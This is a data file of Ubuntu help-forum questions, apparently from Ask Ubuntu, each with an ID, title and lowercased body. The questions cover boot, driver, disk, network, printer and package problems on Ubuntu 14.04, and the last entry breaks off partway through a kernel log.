509662	ubuntu boots to purple/black screen using refind and live usb stick	i followed the instructions http : //www.howtogeek.com/187410/how-to-install-and-dual-boot-linux-on-a-mac/ to add dual boot capabilities to my macbook pro ( mavericks 10.9.4 ) i used the the 64bit ( not amd ) version of ubuntu 14.04 . i used refind i made the partitions in gparted ( using try ubuntu from the live usb stick ) and then used the install link from the desktop , choosing something else and installing it on the ext4 partition . when i tried to do my first boot after install the screen went purple/black .
509663	c++ preprocessor `` /lib/cpp '' fails sanity check	i need to compile hdf5 , and after configure process , i receive this error : configure : error : c++ preprocessor `` /lib/cpp '' fails sanity check and i know i have cpp installed on my ubuntu any help would be really appreciated : ) this is the output of dpkg -- list | grep compiler ii gcc 4:4.8.2-1ubuntu6 amd64 gnu c compiler ii gcc-4.8 4.8.2-19ubuntu1 amd64 gnu c compiler ii gfortran 4:4.8.2-1ubuntu6 amd64 gnu fortran 95 compiler ii gfortran-4.8 4.8.2-19ubuntu1 amd64 gnu fortran compiler ii hardening-includes 2.5ubuntu2 all makefile for enabling compiler flags for security hardening ii libllvm3.4 : amd64 1:3.4-1ubuntu3 amd64 modular compiler and toolchain technologies , runtime library ii libxkbcommon0 : amd64 0.4.1-0ubuntu1 amd64 library interface to the xkb compiler and this is th error i recieve : nazanin @ barashka : ~/hdf5-1.8.13 $ ./configure -- with-zlib=/home/nazanin/local -- prefix=/home/nazanin/local checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking whether make supports nested variables ... ( cached ) yes checking whether to enable maintainer-specific portions of makefiles ... no checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking shell variables initial values ... done checking if basename works ... yes checking if xargs works ... yes checking for cached host ... none checking for config x86_64-unknown-linux-gnu ... no checking for config x86_64-unknown-linux-gnu ... no checking for config unknown-linux-gnu ... no checking for config unknown-linux-gnu ... no checking for config x86_64-linux-gnu ... no checking for config x86_64-linux-gnu ... no checking for config x86_64-unknown ... no checking for config linux-gnu ... found compiler 'gcc ' is gnu gcc-4.8.2 checking for config ./config/site-specific/host-barashka ... no checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking whether gcc understands -c and -o together ... yes checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking if unsupported combinations of configure options are allowed ... no checking if fortran interface enabled ... no checking if fortran 2003 interface enabled ... yes checking whether we are using the gnu c++ compiler ... no checking whether g++ accepts -g ... no checking dependency style of g++ ... none checking how to run the c++ preprocessor ... /lib/cpp configure : error : in `/home/nazanin/hdf5-1.8.13 ' : configure : error : c++ preprocessor `` /lib/cpp '' fails sanity check see `config.log ' for more details do i have to copy the config.log here ? thank you
509667	n2600 and ubuntu 14.04 is slow	my new laptop has an intel n2600 processor , i installed ubuntu 14.04 and it is soooo slow . what is wrong ? is there any help ? or can i use only windows on this machine ?
509672	problems with mouse , mind of its own	i 'm running ubuntu 14.04 with an acer aspire mc605 and the cursor often jumps to the right on its own , freezes or zips around . it 's happened with different mouses ( usb & regular cable ) , when i 'm using the mouse heavily ( copy / pasting ) or just leaving it idle . right after i 've booted up or 30 minutes later . sometimes i have no problem , but rarely . any suggestions on how to fix this ? it does n't seem to be the same issue as the mouse flickering as neither of the solutions worked . i do n't have an unknown display and when i typed : gsettings set org.gnome.settings-daemon.plugins.cursor active false i get this message : no such schema 'org.gnome.settings.daemon.plugins.cursor'
509673	hard drive problem	error mounting : mount exited with exit code 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntfs-3g -o remove_hiberfile /dev/sda5 /media/0862e7a962e79a28 hello , i am facing problems in recovering files in window and i am receiving the above message in ubuntu.so please help me in reaching windows through ubuntu .
509676	windows 8.1 not available in grub after installing ubuntu 14.04	i have win7 , win8.1 and ubuntu installed , each one in a separate partition ( win 8.1 is in a separate hard drive ) . windows 7 and ubuntu are booted in grub but not win8 . before installing ubuntu , secure boot was disabled in win8.1 but there was no uefi firmware settings anywhere in pc setting . after installing ubuntu , i tried : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update sudo apt-get install -y boot-repair & & ( boot-repair & ) but i get : e : unable to locate package boot-repair since i am a newbie in all theses , kindly write any answers in `` for dummies '' format !
509677	triple-boot ubuntu question	i am a new user to ubuntu and linux overall , and wanted to install ubuntu on my older pc . but i wanted to ask how to do it since i have a specific partition setup on it . so as of now , i have dual-boot windows xp on it , and whenever i boot it up , i have 10 seconds time to choose whether i want to boot to the first or the second windows xp . so my question is , if i install ubuntu by selecting third option in installer , install it on a diferrent partition , will the dual-boot i have now still be available ? if ubuntu adds its ' own boot selector , it 's fine , but will everything stay as normal , just ubuntu added to the already present dual-boot ?
509682	ubuntu 14.04 installation on fujitsu siemens notebook - operating system not found	i had windows vista installed on my laptop and installed ubuntu 12.04 next to it , everything worked , then i installed ubuntu 13.10 and it worked . a few weeks ago i wanted to install 14.04 alone on the machine but it ended in '' operating system not found '' i tried to fix it , followed many suggestions i could google , used boot-repair , tried to fix grub manually , but nothing helped . finally i even exchanged my harddisk becuase i thought - maybe something is just broken . now i intalled a 120gb ssd , followed the default installation instructions again but the same problem . the installation completes successfully and after reboot '' operating system not found '' here my latest result from bootrepait : http : //paste.ubuntu.com/8015123 i burned a installation dvd from ubunto 14.04.1 64 bit image my notebook is a fujitsu siemens amilo si 3655 centrino / 64 bit / intel core2duo p8400 2.26ghz / 4gb ram / installed 120gb ssd / intel gma450 graphics .
509686	system wont re boot	have installed ubuntu twice on two different commuters and on blank hard drives system said it was installed but when you go and re boot from hard drive it will not start on reboot on system wants to start on cd rom will not boot from hard drive second computer want start from hard drive either just keep getting blank screen hope some on can help and get me up and gowing thanks
509687	cups stopped at boot after customize squashfs	i try to customize lubuntu 14.04 . i follow the instructions at https : //help.ubuntu.com/community/livecdcustomization . i only do the basic step from preparation until change root , then cleanup until produce the iso image . i do n't do the advanced step . the added applications in my customization are hplip , hplip-gui , and many more obtained using apt-get . some applications are installed from source ( libreoffice and thunderbird mail client ) , and some are from binary packages like skype and chrome web browser . when i boot the modified lubuntu , it stops at the following step : starting cups printing spooling/server i make the installation media using unetbootin , multisystem and startup disc creator . i do not know how to fix and to solve this .
509691	ubuntu 14.04 login goes back to login screen	when i login it again come back to login screen . i tried tty1 terminal to reconfigure lightdm but it does not connect to internet . while connecting to internet it shows the error message path variable error . i think path variable was edited during the installation of openjdk . it seems the path variable need to modified . how to resolve it ?
509695	cp fails to copy with errors `` cp : error reading 'file ' : input/output error '' and `` cp : failed to extend 'file ' : input/output error	i 'm a user of oracle virtualbox on ubuntu . and i used to copy vdi files as a kind of backup . previously i did this ( copying vdi file and then copying it back ) many times without any problem . but today i experienced this error virtualbox vms/win_7 $ cp ../../bkps/win_7.vdi . cp : error reading ‘../../bkps/win_7.vdi’ : input/output error cp : failed to extend ‘./win_7.vdi’ : input/output error i googled for this a little but from the advices on similar problems i undersood nothing unfortunately . could anyone suggest how to solve this , please ? the output from the dmesg is , ( and i understand nothing from it ) [ 2347.982876 ] ata1.00 : exception emask 0x0 sact 0x1900406f serr 0x0 action 0x0 [ 2347.982887 ] ata1.00 : irq_stat 0x40000008 [ 2347.982895 ] ata1.00 : failed command : read fpdma queued [ 2347.982908 ] ata1.00 : cmd 60/08:70 : d0 : da : f4/00:00:2e:00:00/40 tag 14 ncq 4096 in [ 2347.982908 ] res 41/40:08 : d0 : da : f4/00:00:2e:00:00/00 emask 0x409 ( media error ) < f > [ 2347.982915 ] ata1.00 : status : { drdy err } [ 2347.982919 ] ata1.00 : error : { unc } [ 2348.395657 ] ata1.00 : configured for udma/133 [ 2348.395727 ] sd 0:0:0:0 : [ sda ] unhandled sense code [ 2348.395733 ] sd 0:0:0:0 : [ sda ] [ 2348.395737 ] result : hostbyte=did_ok driverbyte=driver_sense [ 2348.395741 ] sd 0:0:0:0 : [ sda ] [ 2348.395745 ] sense key : medium error [ current ] [ descriptor ] [ 2348.395752 ] descriptor sense data with sense descriptors ( in hex ) : [ 2348.395764 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 2348.395770 ] 2e f4 da d0 [ 2348.395772 ] sd 0:0:0:0 : [ sda ] [ 2348.395774 ] add . sense : unrecovered read error - auto reallocate failed [ 2348.395775 ] sd 0:0:0:0 : [ sda ] cdb : [ 2348.395776 ] read ( 10 ) : 28 00 2e f4 da d0 00 00 08 00 [ 2348.395781 ] end_request : i/o error , dev sda , sector 787798736 [ 2348.395792 ] ecryptfs_decrypt_page : error attempting to read lower page ; rc = [ -5 ] [ 2348.395795 ] ata1 : eh complete [ 2348.395797 ] ecryptfs_readpage : error decrypting page ; rc = [ -5 ] [ 2351.264987 ] ata1.00 : exception emask 0x0 sact 0x7f80400 serr 0x0 action 0x0 [ 2351.264998 ] ata1.00 : irq_stat 0x40000008 [ 2351.265005 ] ata1.00 : failed command : read fpdma queued [ 2351.265019 ] ata1.00 : cmd 60/08:50 : d0 : da : f4/00:00:2e:00:00/40 tag 10 ncq 4096 in [ 2351.265019 ] res 41/40:08 : d0 : da : f4/00:00:2e:00:00/00 emask 0x409 ( media error ) < f > [ 2351.265025 ] ata1.00 : status : { drdy err } [ 2351.265029 ] ata1.00 : error : { unc } [ 2351.403371 ] ata1.00 : configured for udma/133 [ 2351.403425 ] sd 0:0:0:0 : [ sda ] unhandled sense code [ 2351.403426 ] sd 0:0:0:0 : [ sda ] [ 2351.403428 ] result : hostbyte=did_ok driverbyte=driver_sense [ 2351.403429 ] sd 0:0:0:0 : [ sda ] [ 2351.403430 ] sense key : medium error [ current ] [ descriptor ] [ 2351.403433 ] descriptor sense data with sense descriptors ( in hex ) : [ 2351.403434 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 2351.403439 ] 2e f4 da d0 [ 2351.403442 ] sd 0:0:0:0 : [ sda ] [ 2351.403444 ] add . sense : unrecovered read error - auto reallocate failed [ 2351.403445 ] sd 0:0:0:0 : [ sda ] cdb : [ 2351.403446 ] read ( 10 ) : 28 00 2e f4 da d0 00 00 08 00 [ 2351.403451 ] end_request : i/o error , dev sda , sector 787798736 [ 2351.403463 ] ecryptfs_decrypt_page : error attempting to read lower page ; rc = [ -5 ] [ 2351.403466 ] ecryptfs_readpage : error decrypting page ; rc = [ -5 ] [ 2351.403470 ] ata1 : eh complete any help is greatly appreciated , thank you in advance
509697	hp printer recognized but not printing	i have an hp laserjet 3055 , it is recognized by the computer ( ubuntu 14.04 ) , i printed a test page and it worked fine , so i moved on to printing my document , and it does n't print , it says on the printer `` printing document '' , but ... it does n't . restarted the printer , and tried to print again , still does n't print , now it also does n't write `` printing document '' , the pages 's status in the queue is `` pending '' , but there is nothing else before them . now test pages wo n't print either . what is going on ? thanks .
509698	dropbox causes software center problems	installed dropbox via software center . ''applying changes '' or when pressing 'x ' button , then ''cancellation '' last forever ! even after restarting comp . removing dropbox via software center lasta forever . removing via terminal , not possible : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? how to stop that ''progress '' in software center and to remove dropbox ? this problem does not let me install other updates either , the message i get is : e : could not get lock /var/lirb/apt/lists/lock - open ( 11 : resource temporarily unavailalbe ) e : unable to lock directory /var/lib/apt/lists/ e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using ? checked these threads ubuntu software center does not proceed from applying changes ubuntu software center stuck in applying/canceling/searcing '' before killing anything , close all windows and make sure there is not a eula popped up behind the software centre . these eulas are very common , especially with software outside of the main repositories. `` -- - > how do you check if there is eula popped up ? ?
509700	intel ac7260 does not sniff ldpc packets	i was searching for a wifi 11ac sniffer which can work on ubuntu . i have tried intel ac-7260 and broadcom 4352 , both minipcie form factor cards . with intel i was able to get the latest firmware and able to sniff . but , it does not sniff if the packets are ldpc encoded other wise it sniffs 1 & 2 spatial stream data . i used 3.15 kernel on ubuntu 12.04 lts . with broadcom , though i have taken latest `` wl '' driver from their web site , i could not set it monitor mode , which i have posted a query at monitor mode on broadcom 6.30.223.248 wl driver does not work any one has tried anything else or using already please share your ideas .
509702	change folder background color and text color in ubuntu 14.04	i am using ubuntu 14.04 and i want to change folder background color from default white to deep gray and text color from default black to white . how can i do that operation ?
509703	can ping but no dns	i have installed ubuntu 14.04 on my laptop . this laptop has a qualcomm atheros qca9565 wifi network card , but no ethernet port . i can connect to the router . i can ping to 8.8.8.8 , but when opening google.com i get `` server not found '' in firefox . i can open websites by using their ip address . i 've opened the connection settings , changed the ipv4 method to `` automatic ( dhcp ) addresses only '' . i 've set dns servers to 8.8.8.8,8.8.4.4 . i 've restarted the network : sudo service networking restart then i get : stop : job failed while stopping start : job is already running : networking so i rebooted to be sure , but no dns . how can i get dns working ?
509706	how to find and star/stop or hide/display indicators ?	i am using ubutnu 14.04 ( lts ) and have following indicators : now from above indicators ( like : bluetooth , classic-menu , indicator-synapse , network , laungage , message , sound , datetime or calendar and last power/setting management ) . i want to start/stop or hide/display some of them . ex ( i only know for one ) : i know that networkmanager can be displayed with nm-applet and can be started/stopped by sudo service network-manager . ( classic-menu and synapse are user indicator ) thus i want to know how other indicators ( ex : for language , message , datetime and specially last indicator ) can be displayed and hide or started and stopped ? what command or applet can i use ?
509707	how to configure a window setup with a script ?	i would like to know if there is any way to execute an script and get a window setup where several programs are executed and positioned in certain points of the desktop with some desired dimensions . also , i would like to use virtual desktops . i 've searched but i have n't found something similar to build upon , and i do n't have a lot of experience with bash so i do n't know where to start . any advice ? thanks .
509709	why using ubuntu get empty laptop 's battery ?	i used to use windows but i 've moved to ubuntu recently . when i work on ubuntu , then suddenly the battery get empty . when i used windows everything worked as well , but it seems ubuntu is n't compatible with laptops .
509710	how to install python3-dateutil in ubuntu 12.04 ( precise ) ?	i am trying to install the package python3-dateutil in a ubuntu 12.04.4 lts ( precise ) with aptitude , but i can not find it anywhere . how can i install it ?
509718	how to install a second graphics card and use 4 monitors ?	i finally decided to take the plunge and ditch windows . after several hours i got things working perfectly with all my apps installed . only problem is that i run 4 desktop displays off 2 nvidia adapters , the first adapter ( geforce gt 240 ) with two screens work perfectly but ca n't seem to get the second adapter ( geforce gt 620 ) installed . using ubuntu 14.04 lts ( amd64 ) please help me with simple instructions please . terminal info to follow : nachtland @ nachtland-ms-7693 : ~ $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation gt215 [ geforce gt 240 ] ( rev a2 ) 02:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 620 ] ( rev a1 ) nachtland @ nachtland-ms-7693 : ~ $ sudo lshw -c video [ sudo ] password for nachtland : *-display description : vga compatible controller product : gt215 [ geforce gt 240 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:82 memory : fd000000-fdffffff memory : b0000000-bfffffff memory : c0000000-c1ffffff ioport : e000 ( size=128 ) memory : fe000000-fe07ffff *-display description : vga compatible controller product : gf108 [ geforce gt 620 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:83 memory : fb000000-fbffffff memory : c8000000-cfffffff memory : d0000000-d1ffffff ioport : d000 ( size=128 ) memory : fc000000-fc07ffff nachtland @ nachtland-ms-7693 : ~ $
509722	c/c++ compiler for ubuntu like dev-c++	need a good c/c++ compiler for ubuntu . i like coding or programming . i used dev-c++ on windows . is there any good compilers like dev-c++ ? i tried code : :blocks ide but it seems a little buggy for me .
509724	how to diagnose package dependancies ?	i want to install postfixadmin on trusty . i 'm confused about dependencies . http : //packages.ubuntu.com/trusty/postfixadmin shows ( i think ) that it needs apache2 or lighttpd or the httpd to be installed . i have already installed nginx-full , which , i believe should satisfy httpd and therefore apt should not need to install apache . but apt-get -s install postfixadmin wants to install apache2 , and i do n't understand why ? any ideas ?
509730	lenovo-ideapad-y510p ubuntu 14.04 bluetooth not working/recognised	i hope someone can help me unduerstandig this problem . it looks like the bluetooth adapter is not recognised . following other discussion i submited the following command . ado @ ado-lenovo-ideapad-y510p : ~ $ sudo lsmod | grep bluetooth bluetooth 391196 10 bnep , rfcomm ado @ ado-lenovo-ideapad-y510p : ~ $ lsusb bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 007 : id 058f:9410 alcor micro corp . keyboard bus 003 device 006 : id 093a:2510 pixart imaging , inc. optical mouse bus 003 device 005 : id 0603:00f2 novatek microelectronics corp. **strong text**bus 003 device 004 : id 8054:0001 bus 003 device 002 : id 174f:1474 syntek bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub ado @ ado-lenovo-ideapad-y510p : ~ $ lsmod | grep btusb btusb 32412 0 bluetooth 391196 11 bnep , btusb , rfcomm ado @ ado-lenovo-ideapad-y510p : ~ $ dmesg | grep -i bluetooth [ 10.648863 ] bluetooth : core ver 2.17 [ 10.648876 ] bluetooth : hci device and connection manager initialized [ 10.648882 ] bluetooth : hci socket layer initialized [ 10.648884 ] bluetooth : l2cap socket layer initialized [ 10.648886 ] bluetooth : sco socket layer initialized [ 10.651151 ] bluetooth : rfcomm tty layer initialized [ 10.651158 ] bluetooth : rfcomm socket layer initialized [ 10.651161 ] bluetooth : rfcomm ver 1.11 [ 10.653651 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 10.653654 ] bluetooth : bnep filters : protocol multicast [ 10.653661 ] bluetooth : bnep socket layer initialized [ 8985.098841 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 8989.875220 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 8989.976070 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 8994.646658 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 8994.690360 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 8999.418390 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 8999.506992 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9004.198112 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9004.221136 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9008.976503 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9009.037834 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc x86_pkg_temp_thermal intel_powerclamp coretemp lib80211_crypt_tkip kvm_intel snd_seq_midi snd_seq_midi_event kvm snd_rawmidi crct10dif_pclmul crc32_pclmul ghash_clmulni_intel nouveau aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd mxm_wmi snd_seq wl ( pof ) lib80211 snd_seq_device ttm i915 joydev cfg80211 serio_raw snd_timer drm_kms_helper lpc_ich drm snd mei_me mei soundcore i2c_algo_bit ideapad_laptop sparse_keymap wmi mac_hid video parport_pc ppdev lp parport psmouse ahci alx libahci mdio [ 9013.758455 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) michael_mic arc4 bnep rfcomm bluetooth binfmt_misc snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev hid_generic usbhid hid snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc 